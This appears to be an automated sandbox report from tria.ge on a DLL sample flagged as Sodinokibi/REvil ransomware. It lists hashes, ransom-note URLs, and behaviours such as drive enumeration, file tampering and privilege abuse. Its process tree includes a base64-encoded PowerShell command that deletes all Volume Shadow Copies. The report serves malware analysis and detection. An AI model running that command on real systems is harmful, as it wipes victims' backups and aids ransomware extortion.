Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
13/05/2024, 22:33
Static task
static1
Behavioral task
behavioral1
Sample
3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll
Resource
win10v2004-20240426-en
General
-
Target
3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll
-
Size
166KB
-
MD5
3cd7e62bc197926278810ea5f6adff19
-
SHA1
ad18b4f27039aa3b3ca59b7b6d8ea5cb309d78a7
-
SHA256
2a28f11ca820bd0bde24d41cb5307c8f2fa70174536ac13a99923ba70015b36f
-
SHA512
214852706e4bb89464a92625e3594b19afe4c99157d1706493e4114ac5510a64d3af7ff88f09273c67ad3d20f1ead61e8740acc4147432c64755e9eccbac7c71
-
SSDEEP
3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3Q44CTrZmDa:NJ0BXScFyfC3Hd4ygmoD
Malware Config
Extracted
C:\Users\2zv742-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7F8F90C705CD611
http://decryptor.cc/A7F8F90C705CD611
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\Q: rundll32.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification \??\c:\program files\TraceUndo.htm rundll32.exe File opened for modification \??\c:\program files\UnpublishTrace.vsw rundll32.exe File created \??\c:\program files (x86)\2zv742-readme.txt rundll32.exe File opened for modification \??\c:\program files\BackupUpdate.js rundll32.exe File opened for modification \??\c:\program files\ReceiveSet.M2TS rundll32.exe File created \??\c:\program files\2zv742-readme.txt rundll32.exe File opened for modification \??\c:\program files\RedoUse.gif rundll32.exe File opened for modification \??\c:\program files\SplitOptimize.3gp2 rundll32.exe File opened for modification \??\c:\program files\UpdatePing.i64 rundll32.exe File opened for modification \??\c:\program files\GetConvert.vb rundll32.exe File opened for modification \??\c:\program files\LockGrant.mpg rundll32.exe File opened for modification \??\c:\program files\LockRegister.asp rundll32.exe File opened for modification \??\c:\program files\PushImport.clr rundll32.exe File opened for modification \??\c:\program files\ShowCopy.inf rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 880 rundll32.exe 880 rundll32.exe 1996 powershell.exe 1996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 880 rundll32.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeBackupPrivilege 3924 vssvc.exe Token: SeRestorePrivilege 3924 vssvc.exe Token: SeAuditPrivilege 3924 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 1524 wrote to memory of 880 1524 rundll32.exe 83 PID 1524 wrote to memory of 880 1524 rundll32.exe 83 PID 1524 wrote to memory of 880 1524 rundll32.exe 83 PID 880 wrote to memory of 1996 880 rundll32.exe 91 PID 880 wrote to memory of 1996 880 rundll32.exe 91 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2496
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3924
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5b329be068ff2e87004dbe5507f336a87
SHA102047e420b95870c1fff5a67df61e894fc5e3f36
SHA256001b0d09b98c4e44564765d98e54528b63ce510730f93c53400ac9e822ff55ff
SHA512e5e2dd95b526313f385b9ae87fe3edc8c4781d54879d67976ab2c0c8ac711b70b7a22a147f27135d390a6a818565a1d48a018f0417f57d520d0aac2ef5b42c06
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82